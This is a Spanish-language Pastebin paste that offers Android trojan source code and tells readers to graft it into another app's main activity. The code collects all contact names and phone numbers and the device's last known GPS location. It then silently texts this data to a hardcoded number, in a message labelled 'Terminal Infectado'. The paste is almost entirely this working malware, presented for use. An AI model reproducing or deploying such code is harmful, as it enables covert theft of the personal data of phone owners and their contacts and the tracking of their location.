API tools faq
paste
Advertisement
LegionJJ

Código de malware #Android by @P0iz0N

LegionJJ
Apr 26th, 2013
173
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.95 KB | None | 0 0
raw download clone embed print report
  1. *El código se inserta en el archivo principal "Mainactivitiy.java" tras el punto main que en el caso de las aplicaciones de Android esta después de oncreate.
  2. Este intento de "virus" troyano se acopla al código de otra app para agregar las funciones de dumpeo de data.
  3. Código que accede a los contactos del dispositivo y los almacena en un hashmap para después hacer con ellos lo que queramos*
  4.  
  5.  
  6.  
  7. 01
  8. ArrayList<HashMap<String, String>> agenda = getContacts();
  9. 02
  10. for (HashMap<String, String> map : agenda) {
  11. 03
  12. for (Map.Entry<String, String> mapEntry : map.entrySet()) {
  13. 04
  14. key = mapEntry.getKey();
  15. 05
  16. value = mapEntry.getValue();
  17. 06
  18. datos = datos + "--" + key + ":" + value;
  19. 07
  20. }
  21. 08
  22. }
  23. 09
  24.  
  25. 10
  26. private ArrayList<HashMap<String, String>> getContacts() {
  27. 11
  28. ContentResolver cr = getContentResolver();
  29. 12
  30. Cursor cCur = cr.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
  31. 13
  32. Cursor pCur = cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
  33. 14
  34.  
  35. 15
  36. ArrayList<HashMap<String, String>> data = new ArrayList<HashMap<String, String>>();
  37. 16
  38.  
  39. 17
  40. HashMap<String, String> contacts = new HashMap<String, String>();
  41. 18
  42.  
  43. 19
  44. while (cCur.moveToNext()) {
  45. 20
  46. String id = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  47. 21
  48. String name = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.DISPLAY_NAME));
  49. 22
  50. contacts.put(id, name);
  51. 23
  52. }
  53. 24
  54. while (pCur.moveToNext()) {
  55. 25
  56. String id = pCur.getString(pCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  57. 26
  58. String name = contacts.get(id);
  59. 27
  60. String phone = pCur.getString(pCur.getColumnIndex(ContactsContract.CommonDataKinds.Phone.DATA));
  61. 28
  62. HashMap<String, String> h = new HashMap<String, String>();
  63. 29
  64. h.put("name", name);
  65. 30
  66. h.put("phone", phone);
  67. 31
  68. data.add(h);
  69. 32
  70. }
  71. 33
  72. pCur.close();
  73. 34
  74. cCur.close();
  75. 35
  76. return data;
  77. 36
  78. }
  79. -------------------------------------------------------------------------------------------------------------------
  80.  
  81. * Función de extracción de datos de coordenadas GPS del dispositivo *
  82.  
  83. 01
  84. LocationManager LC = (LocationManager) getSystemService(Context.LOCATION_SERVICE);
  85. 02
  86. Criteria criteria = new Criteria();
  87. 03
  88. provider = LC.getBestProvider(criteria, false);
  89. 04
  90.  
  91. 05
  92. Location loc = LC.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);
  93. 06
  94. if (loc != null) {
  95. 07
  96. Toast.makeText(this, "Provider:" + provider, Toast.LENGTH_LONG).show();
  97. 08
  98. onLocationChanged(loc);
  99. 09
  100. } else {
  101. 10
  102. latitudeval.setText("NO PROVIDER");
  103. 11
  104. }
  105. 12
  106.  
  107. 13
  108. public void onLocationChanged(Location location) {
  109. 14
  110. double lat = location.getLatitude();
  111. 15
  112. double lon = location.getLongitude();
  113. 16
  114. lati = String.valueOf(lat);
  115. 17
  116. longi = String.valueOf(lon);
  117. 18
  118.  
  119. 19
  120. }
  121.  
  122. -------------------------------------------------------------------------------------------------------------------
  123.  
  124. *Código que envía el mensaje es el siguiente:
  125.  
  126. 1
  127. phoneNo = "66666666";
  128. 2
  129. sms = "Terminal Infectado: Datos Agenda:" + datos + " Localizacion:" + " " + lati + " " + longi;
  130. 3
  131. SmsManager smsManager = SmsManager.getDefault();
  132. 4
  133. smsManager.sendTextMessage(phoneNo, null, sms, null, null);
  134.  
  135. ------------------------------------------------------------------------------------------------------------------
  136. *Código completo*
  137.  
  138.  
  139. 01
  140. package Realpentester.Malware;
  141. 02
  142. import android.app.Activity;
  143. 03
  144. import android.content.*;
  145. 04
  146. import android.database.Cursor;
  147. 05
  148. import android.location.*;
  149. 06
  150. import android.os.Bundle;
  151. 07
  152. import android.provider.ContactsContract;
  153. 08
  154. import android.telephony.SmsManager;
  155. 09
  156. import android.widget.Button;
  157. 10
  158. import android.widget.EditText;
  159. 11
  160. import android.widget.TextView;
  161. 12
  162. import android.widget.Toast;
  163. 13
  164. import java.util.*;
  165. 14
  166.  
  167. 15
  168. public class Realpentester extends Activity {
  169. 16
  170. private TextView latitudeval;
  171. 17
  172. private String provider;
  173. 18
  174. TextView txtEnviado;
  175. 19
  176. public String key;
  177. 20
  178. public String value;
  179. 21
  180. public String datos = "";
  181. 22
  182. public String phoneNo;
  183. 23
  184. public String sms;
  185. 24
  186. public String lati;
  187. 25
  188. public String longi;
  189. 26
  190.  
  191. 27
  192. /**
  193. 28
  194. * Called when the activity is first created.
  195. 29
  196. */
  197. 30
  198. @Override
  199. 31
  200. public void onCreate(Bundle savedInstanceState) {
  201. 32
  202. super.onCreate(savedInstanceState);
  203. 33
  204. setContentView(R.layout.main);
  205. 34
  206.  
  207. 35
  208. txtEnviado = (TextView) findViewById(R.id.txtEnviado);
  209. 36
  210.  
  211. 37
  212. LocationManager LC = (LocationManager) getSystemService(Context.LOCATION_SERVICE);
  213. 38
  214. Criteria criteria = new Criteria();
  215. 39
  216. provider = LC.getBestProvider(criteria, false);
  217. 40
  218.  
  219. 41
  220. Location loc = LC.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);
  221. 42
  222. if (loc != null) {
  223. 43
  224. Toast.makeText(this, "Provider:" + provider, Toast.LENGTH_LONG).show();
  225. 44
  226. onLocationChanged(loc);
  227. 45
  228. } else {
  229. 46
  230. latitudeval.setText("NO PROVIDER");
  231. 47
  232. }
  233. 48
  234. ArrayList<HashMap<String, String>> agenda = getContacts();
  235. 49
  236. for (HashMap<String, String> map : agenda) {
  237. 50
  238. for (Map.Entry<String, String> mapEntry : map.entrySet()) {
  239. 51
  240. key = mapEntry.getKey();
  241. 52
  242. value = mapEntry.getValue();
  243. 53
  244. datos = datos + "--" + key + ":" + value;
  245. 54
  246. }
  247. 55
  248. }
  249. 56
  250.  
  251. 57
  252. //LINEA DONDE SE CAMBIAN OS TELEFONOS A LOS QUE MANDAMOS LOS DATOS EXTRAIDOS DEL DISPOSITIVO
  253. 58
  254. phoneNo = "66666666";
  255. 59
  256. sms = "Terminal Infectado: Datos Agenda:" + datos + " Localizacion:" + " " + lati + " " + longi;
  257. 60
  258. SmsManager smsManager = SmsManager.getDefault();
  259. 61
  260. smsManager.sendTextMessage(phoneNo, null, sms, null, null);
  261. 62
  262. }
  263. 63
  264. public void onLocationChanged(Location location) {
  265. 64
  266. double lat = location.getLatitude();
  267. 65
  268. double lon = location.getLongitude();
  269. 66
  270. lati = String.valueOf(lat);
  271. 67
  272. longi = String.valueOf(lon);
  273. 68
  274.  
  275. 69
  276. }
  277. 70
  278.  
  279. 71
  280.  
  281. 72
  282.  
  283. 73
  284. private ArrayList<HashMap<String, String>> getContacts() {
  285. 74
  286. ContentResolver cr = getContentResolver();
  287. 75
  288. Cursor cCur = cr.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
  289. 76
  290. Cursor pCur = cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
  291. 77
  292. ArrayList<HashMap<String, String>> data = new ArrayList<HashMap<String, String>>();
  293. 78
  294. HashMap<String, String> contacts = new HashMap<String, String>();
  295. 79
  296. while (cCur.moveToNext()) {
  297. 80
  298. String id = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  299. 81
  300. String name = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.DISPLAY_NAME));
  301. 82
  302. contacts.put(id, name);
  303. 83
  304. }
  305. 84
  306.  
  307. 85
  308. while (pCur.moveToNext()) {
  309. 86
  310. String id = pCur.getString(pCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  311. 87
  312. String name = contacts.get(id);
  313. 88
  314. String phone = pCur.getString(pCur.getColumnIndex(ContactsContract.CommonDataKinds.Phone.DATA));
  315. 89
  316. HashMap<String, String> h = new HashMap<String, String>();
  317. 90
  318. h.put("name", name);
  319. 91
  320. h.put("phone", phone);
  321. 92
  322. data.add(h);
  323. 93
  324. }
  325. 94
  326. pCur.close();
  327. 95
  328. cCur.close();
  329. 96
  330. return data;
  331. 97
  332. }
  333. 98
  334. }
  335.  
  336.  
  337. Diviertanse ! By Poiz0n Stark
  338. Twitter: @P0iz0N #AL
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!